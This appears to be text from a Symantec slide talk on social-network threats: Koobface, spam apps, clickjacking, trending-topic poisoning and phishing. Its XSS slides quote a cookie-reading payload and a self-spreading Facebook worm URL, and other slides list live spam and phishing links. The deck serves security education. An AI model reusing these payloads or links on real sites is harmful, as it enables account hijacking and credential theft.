Security threats on social networks Nithya Raman Senior Security Analyst Symantec
Facebook - 4th largest U.S. web property in
audience size with 157.2 million visitors
Linkedin.com -33.4 million visitors
Twitter.com -27.0 million visitors
All-time U.S.
audience highs
in May 2011
Data from comScore
Rise of social networking
More than 750 million active users
50% of our active users log on to
Facebook in any given day
Average user has 130 friends
People spend over 700 billion minutes per
month on Facebook
People on Facebook install 20 million
applications every day Data from Facebook
Facebook Statistics
Both Facebook and Twitter allow third
party applications
Spam applications are a common
occurrence on these sites
Applications have also been used to
spread adware, phishing links and other
malware
Malicious applications on Facebook and Twitter
Automatically adds status messages and wall
posts/tweets
Usually leads to human verification
tests/surveys. You're tricked into believing that
you need to complete the survey in order to see
the promised content.
The scammers, meanwhile, are earning
commission for every survey completed, and are
using your Facebook account to spread the links
even further.
Spam applications
Spam Link Number of clicks
bit.ly/e9zZvk 281,167
bit.ly/dSUqN6 85,833
bit.ly/fCTbAB 71,372
bit.ly/fQEUl9 21,267
Clicks data for spam apps
Similar to spam applications, usually
spreads using wall posts/tweets and
messages
Applications can redirect to
- fake codec/antivirus pages
- phishing pages
- other malware/exploits
Malware applications
First appeared in late 2008
Spreads across social networks like
Facebook, MySpace and Twitter
Uses wall posts/tweets containing a link
that usually leads to a page which looks
like a YouTube video
Offers a fake Adobe Flash Player update –
Koobface Zombie executable
What is Koobface?
Spread through social networks
Steal confidential information, software license keys
Redirect web browsing to malicious sites and inject
advertising
Intercept Internet traffic and block access to certain
Internet sites
Download additional files/pay-per-install software
Break CAPTCHAs, determine if a link is blocked by
Create new Blogspot accounts and pages
Modify the Hosts file
Koobface behaviour
Wall Posts/Tweets
Direct messages
Koobface links are usually accompanied
with enticing messages such as
Cool Video <malicious link>
LOL <malicious link>
Last Video <malicious link>
Spreading techniques
Malicious link Count
Blogspot.com pages 15841
'bit.ly' shortened
links
37133
Google links
184
Other links 1035
Koobface data
Blogspot.com pages
15841 29.2%
bit.ly' short links 37133 68.5%
Google links 184
0.3%
Other links 1035 1.9%
Koobface links
Total number of unique Koobface links :54193
Total number of clicks 3,671,541
Average number of clicks per link 99
Maximum number of clicks per link 12836
Number of links with over 10K clicks 73
‘bit.ly’ link statistics
Multiple redirections
Shortened links
69% of links collected were „bit.ly‟ short links
Referrer URL check
Google news page/ other clean pages in case Referrer
is not set
User Agent check
Broken URLs
Adding random text just before the valid URL link
Detection evasion techniques
User is lured with a message as bait to a
prepared site.
User is asked to copy a Javascript to the
browser address bar and to click the
„Enter‟ key.
Manual script scams
Updates your FB status with these spam messages and
also post on your friends wall.
Sends chat messages to friends
Adds “Likes” to different Facebook pages
Tags you in images
Create an event and send an invitation to all your
friends.
Facebook provides a personalized email id, using which
you can update your FB status. This script tries to gain
access to this personalized email id, so the hacker can
update your FB status anytime.
http://www.facebook.com/mobile/?v=photos
Script behavior
The practice of deceptively directing a
website visitor‟s clicks to an undesired
element of another site
Attacker overlays multiple transparent or
opaque layers to trick a user into clicking
on a button or link on another page
Clicks meant for original page are hijacked
and routed to another page
What is clickjacking?
Cross-Site Scripting attacks are a type of
injection problem, in which malicious
scripts are injected into the otherwise
benign and trusted web sites.
Facebook has been vulnerable to both
persistent and non-persistent XSS attacks
Cross-site scripting on Facebook
Vulnerability existed in the mobile API
version of Facebook due to insufficient
JavaScript filtering
hxxp://m.facebook.com/connect/prompt_fee
d.php?display=wap&user_message_prom
pt=<script>alert(document.cookie);</sc
ript>
Non-persistent XSS – Facebook worm (March 2011)
The shortened tinyurl.com link redirects to the following URL(de-
obfuscated)
hxxp://m.facebook.com/connect/prompt_feed.php?display=wap&user_
message_prompt='<script>window.onload=function(){document.for
ms[0].message.value='jangan salahin w kalo lo bakal ngakak
ngeliat ni orang :D
http://tinyurl.com/sampahh';document.forms[0].submit();}</script>
This URL automatically adds a wall post with the message 'jangan
salahin w kalo lo bakal ngakak ngeliat ni orang :D
hxxp://tinyurl.com/sampahh'.
Non-persistent XSS – Facebook worm
Look for latest news and events – Twitter
trending topics
http://api.twitter.com/1/trends/current.json
Twitter trending topics poisoning
Mask the malicious URLs
URL-shortening services are commonly
used on services like Twitter in order to
conserve space
Various shortening services such as
tinyurl.com, bit.ly, tiny.cc have been used
to mask URLs
Twitter trending topics poisoning
Compose a collection of messages to
tweet
Create messages with Twitter trending
topics/ hashtags planted randomly into the
message
Start tweeting!
Tweets are sent from a different
fraudulent/ compromised accounts
Twitter trending topics poisoning
Spoofed websites designed to fool
recipients into divulging their credentials
Again, these scams are usually
accompanied with enticing messages
Wall posts, messages or tweets could
contain
- direct links to the phishing site
- obfuscated shortened links
- via. applications
Facebook and Twitter phishing scams
Link on the tweet First Redirection Second redirection
http://t.co/QYQfGIa http://kurz.es/8b3fcb http://itwittiler.com/twitterlogin1
http://kurz.es/8b3fcb
http://itwittiler.com/twitterlog
in1
http://t.co/lAyDmRZ http://i2h.de/b0tb
http://xxx-black-
book.com/twitterlogin1/
http://t.co/9hk72A5 http://kurz.es/8b3fcb http://itwittiler.com/twitterlogin1
http://t.co/PaFDmUJ http://kurz.es/8b3fcb http://itwittiler.com/twitterlogin1
http://i2h.de/b0tb
http://xxx-black-
book.com/twitterlogin1/
Twitter phishing links